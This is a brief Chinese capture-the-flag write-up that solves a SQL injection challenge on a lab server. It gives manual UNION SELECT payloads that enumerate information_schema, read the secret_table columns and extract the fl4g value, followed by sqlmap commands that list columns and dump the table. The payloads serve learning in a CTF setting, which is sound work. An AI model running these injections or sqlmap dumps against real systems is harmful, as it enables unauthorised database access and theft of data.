手工注入
查询所有数据库名称和表名
’ union select 1,table_schema,table_name from information_schema.tables#
- 发现就两个数据库information_schema与news
- 查询news数据库中的表的名称
’ union select 1,table_schema,table_name from information_schema.tables where table_schema=‘news’ #
- 查询secret_table里面的列名
’ union select 1,table_name,column_name from information_schema.columns where table_name=‘secret_table’ # - 查询fl4g里的字段
’ union select 1,1,fl4g from secret_table #
sqlmap
sqlmap常用命令:
https://www.cnblogs.com/iAmSoScArEd/articles/9263735.html
- post的注入方式 sqlmap -u “url” --data “search=suibianxie”
- 查看表信息
- sqlmap -u “http://111.198.29.45:31363/” --data “search=acf” --columns
- 查看fl4g字段 --dump查看表中数据即可
- sqlmap -u “http://111.198.29.45:31363/” --data “search=acf” -T secret_table --dump